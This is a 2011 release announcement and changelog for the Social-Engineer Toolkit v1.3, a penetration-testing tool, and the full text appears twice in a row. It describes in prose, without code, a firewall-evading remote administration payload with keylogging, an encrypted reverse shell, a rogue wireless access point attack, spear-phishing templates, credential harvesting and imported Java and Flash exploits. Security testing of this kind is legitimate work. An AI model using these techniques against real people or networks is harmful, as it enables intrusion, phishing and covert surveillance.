March 28, 2011
Thursday, 8:00PM EST, ISDPodcast LIVE, SET v1.3 being released.
Written by
David Kennedy
Security Testing & Analysis
Social Engineering
The Social-Engineer Toolkit (SET) v1.3 "Artillery Edition" will be released on Thursday March 31st 2011 at 8:00PM EST LIVE on the ISDPodcast. You won't want to miss it and you'll want to follow the ISDPodcast crew on twitter for updated information on what's going to be released, have a couple of additional surprises coming. Be sure to be listening live to the ISDPodcast on Thursday to get the download details and how to update!
This version of the Social-Engineer Toolkit is one of my favorite releases as it introduces several new features, payloads, and attack vectors. I've spent a significant amount of time working on this release and can say it's one of the most stable and redesigned versions to date. I've pretty much exhausted and reimplemented socket handling within Python which I didn't think would be possible. A couple of the major highlights is Thomas Werth, most famous for his Java Applet within SET is now an official developer on the toolkit. Thomas has done an amazing job contributing to SET and was a natural evolution to include him as one of the developers. In this release Thomas has released the Remote Administration Tool Tommy Edition (RATTE) payload module as part of SET. This payload tunnels all communications over a hijacked Internet Explorer or FireFox instance and tunnels the information leveraging whatever proxy settings they have available. The payload gives you the option to drop into a shell, upload files, download files, keystroke logging, and others. This module is integrated and part of SET. This completely defeats any egress based filtering and firewall capabilities to date. This is an extremely powerful tool and something that is an awesome addition to SET.
In addition to RATTE, I've written a completely custom interactive SET shell that leverages AES 256 based encryption and randomized cipher key exchanges per connection. The payload is fully integrated into SET and has the ability to act as a reverse payload and has capabilities such as dropping into a command shell, uploading, downloading files, reverse port SSH tunneling, and listing/killing processes. This is the first release of the interactive shell and will be a work in progress as SET begins to mature and grow.
There is a new attack vector called the "Wireless Access Point Attack Vector" which leverages airbase-ng (thanks Mister_X and Elwood) to create a rogue access point, dns spoof, and issue dhcp IP addresses all automatically for you. It launches everything in the background and redirects all HTTP based communications to your rogue access point. You can then launch any attack you want, for example the Java Applet Attack or Multi-Attack vectors. This new attack vector is a great evolution of SET and now leverages wireless based technologies to attack victims.
There were also a record number of community contributions in this version. There is a new teensy payload that specifically targets GNOME based Linux systems as well as existing improvements on multi-lingual support on the existing Teensy payloads.
In addition to the new attack vectors, there is a number of new templates added to the spear-phishing attack vector, new exploits imported from Metasploit, bug fixes and more.
Below is a full change log of the changes in SET, please note that this will change slightly as three additional features are near completion for Thursday's release:
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* Updated the web-gui interface to reflect all new PDF exploits
* Updated the web-gui interface to reflect all new client-side exploits
* Added a new setup.py installer file for debian based systems only, will add manual install options later
* Updated all of the powershell HID attack vectors to fix bugs and support multi-language support. Thanks padzero!
* Added AES encryption to the socket communication, it requires Crypto.Cipher which is from the PyCrypto libraries.
* Added python-crypto to the installer setup.py installation
* Fixed web-gui alignment on new options so they match up properly to SET-interface
* Added better error handling around the openssl python module if it isn't installed
* Added download_file capabilities into the SET interactive shell.
* Added upload_file capabilites into the SET interactive shell.
* Added shell capabilties into the SET interactive shell.
* Added ssh_tunneling capabilities into the SET interactive shell. You can tunnel any port you want to over ssh
* Added a teensy Gnome wget payload thanks to Hugo Caron (y0ug)!
* Fixed a bug in a menu where teensy payload return to menu would not return properly to main menu
* Fixed a bug where the Mass Mailer Menu didn't properly return back to main menu when specified.
* Added process list in the SET interactive shell.
* Added process kill in the SET interactive shell.
* Added dsniff to set_config as an option instead of ettercap, can use either one.
* Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log
* Added logging to main SET interface, handles main SET interactive shell errors
* Added logging to arp_cache.py file, handles arp cache errors
* Added logging to hijacking.py file, handles dll_hijacking errors
* Added logging to harvester.py file, handles credential harvesting errors
* Added logging to payloadgen.py file, handles payload generation errors
* Fixed a bug where if site wouldn't clone properly it would just exit SET, it now just returns back to main menu.
* Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown
* Added logging to web_server.py file, handles main SET web server errors
* Added logging to spawn.py file, handles main spawn handles for SET
* Added the ability to specify high priority during emails or not, thanks Jonathan Murray!
* Added new core module libary called log(error) will centralize log messages through core function calls
* Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit
* Moved version number to src/main/ instead of src root
* Added the new RATTE payloads to SET that was created by Thomas Werth to circumvent firewall based restrictions. Awesome addition!
* Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui
* Fixed a bug in web gui where if HTML/Plain wasn't specified, it would not properly run the answer file to launch the attack
* Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui
* Fixed a mishandling of OS.Error exceptions in spawn.py which caused SET to spit out a pexpect exceptions error when using KeyBoardInterrupt exceptions handler
* Deleted the database directory under src, was no longer needed
* Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface
* Added RATTE to the SET Web GUI under the payload selection area, it's only to be used for the Java Applet attack.
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui.
* Added six more spear-phishing templates that can be found under the spear-phish attack menu
* Added a new attack vector called the SET Wireless Attack Vector, this will create a fake access point and redirect all traffic to you
* Added the ability to stop all services/processes started by the SET Wireless Attack vector, it is now under the options menu
* Added the Thomas Werth RATTE module to third party modules as well as under the main payload section. Great example to tweak third party modules and add things.
* Added airbase-ng to SET in case it is not installed. Thanks to Mister-X for the approval to include it into SET!
* Added new wireless attack vector to the SET web gui, menus have been changed slightly
* Added the new templates recently added to the SET web gui, they are under the spear-phish menu
This version of the Social-Engineer Toolkit is one of my favorite releases as it introduces several new features, payloads, and attack vectors. I've spent a significant amount of time working on this release and can say it's one of the most stable and redesigned versions to date. I've pretty much exhausted and reimplemented socket handling within Python which I didn't think would be possible. A couple of the major highlights is Thomas Werth, most famous for his Java Applet within SET is now an official developer on the toolkit. Thomas has done an amazing job contributing to SET and was a natural evolution to include him as one of the developers. In this release Thomas has released the Remote Administration Tool Tommy Edition (RATTE) payload module as part of SET. This payload tunnels all communications over a hijacked Internet Explorer or FireFox instance and tunnels the information leveraging whatever proxy settings they have available. The payload gives you the option to drop into a shell, upload files, download files, keystroke logging, and others. This module is integrated and part of SET. This completely defeats any egress based filtering and firewall capabilities to date. This is an extremely powerful tool and something that is an awesome addition to SET.
In addition to RATTE, I've written a completely custom interactive SET shell that leverages AES 256 based encryption and randomized cipher key exchanges per connection. The payload is fully integrated into SET and has the ability to act as a reverse payload and has capabilities such as dropping into a command shell, uploading, downloading files, reverse port SSH tunneling, and listing/killing processes. This is the first release of the interactive shell and will be a work in progress as SET begins to mature and grow.
There is a new attack vector called the "Wireless Access Point Attack Vector" which leverages airbase-ng (thanks Mister_X and Elwood) to create a rogue access point, dns spoof, and issue dhcp IP addresses all automatically for you. It launches everything in the background and redirects all HTTP based communications to your rogue access point. You can then launch any attack you want, for example the Java Applet Attack or Multi-Attack vectors. This new attack vector is a great evolution of SET and now leverages wireless based technologies to attack victims.
There were also a record number of community contributions in this version. There is a new teensy payload that specifically targets GNOME based Linux systems as well as existing improvements on multi-lingual support on the existing Teensy payloads.
In addition to the new attack vectors, there is a number of new templates added to the spear-phishing attack vector, new exploits imported from Metasploit, bug fixes and more.
Below is a full change log of the changes in SET, please note that this will change slightly as three additional features are near completion for Thursday's release:
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* Updated the web-gui interface to reflect all new PDF exploits
* Updated the web-gui interface to reflect all new client-side exploits
* Added a new setup.py installer file for debian based systems only, will add manual install options later
* Updated all of the powershell HID attack vectors to fix bugs and support multi-language support. Thanks padzero!
* Added AES encryption to the socket communication, it requires Crypto.Cipher which is from the PyCrypto libraries.
* Added python-crypto to the installer setup.py installation
* Fixed web-gui alignment on new options so they match up properly to SET-interface
* Added better error handling around the openssl python module if it isn't installed
* Added download_file capabilities into the SET interactive shell.
* Added upload_file capabilites into the SET interactive shell.
* Added shell capabilties into the SET interactive shell.
* Added ssh_tunneling capabilities into the SET interactive shell. You can tunnel any port you want to over ssh
* Added a teensy Gnome wget payload thanks to Hugo Caron (y0ug)!
* Fixed a bug in a menu where teensy payload return to menu would not return properly to main menu
* Fixed a bug where the Mass Mailer Menu didn't properly return back to main menu when specified.
* Added process list in the SET interactive shell.
* Added process kill in the SET interactive shell.
* Added dsniff to set_config as an option instead of ettercap, can use either one.
* Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log
* Added logging to main SET interface, handles main SET interactive shell errors
* Added logging to arp_cache.py file, handles arp cache errors
* Added logging to hijacking.py file, handles dll_hijacking errors
* Added logging to harvester.py file, handles credential harvesting errors
* Added logging to payloadgen.py file, handles payload generation errors
* Fixed a bug where if site wouldn't clone properly it would just exit SET, it now just returns back to main menu.
* Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown
* Added logging to web_server.py file, handles main SET web server errors
* Added logging to spawn.py file, handles main spawn handles for SET
* Added the ability to specify high priority during emails or not, thanks Jonathan Murray!
* Added new core module libary called log(error) will centralize log messages through core function calls
* Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit
* Moved version number to src/main/ instead of src root
* Added the new RATTE payloads to SET that was created by Thomas Werth to circumvent firewall based restrictions. Awesome addition!
* Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui
* Fixed a bug in web gui where if HTML/Plain wasn't specified, it would not properly run the answer file to launch the attack
* Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui
* Fixed a mishandling of OS.Error exceptions in spawn.py which caused SET to spit out a pexpect exceptions error when using KeyBoardInterrupt exceptions handler
* Deleted the database directory under src, was no longer needed
* Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface
* Added RATTE to the SET Web GUI under the payload selection area, it's only to be used for the Java Applet attack.
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui.
* Added six more spear-phishing templates that can be found under the spear-phish attack menu
* Added a new attack vector called the SET Wireless Attack Vector, this will create a fake access point and redirect all traffic to you
* Added the ability to stop all services/processes started by the SET Wireless Attack vector, it is now under the options menu
* Added the Thomas Werth RATTE module to third party modules as well as under the main payload section. Great example to tweak third party modules and add things.
* Added airbase-ng to SET in case it is not installed. Thanks to Mister-X for the approval to include it into SET!
* Added new wireless attack vector to the SET web gui, menus have been changed slightly
* Added the new templates recently added to the SET web gui, they are under the spear-phish menu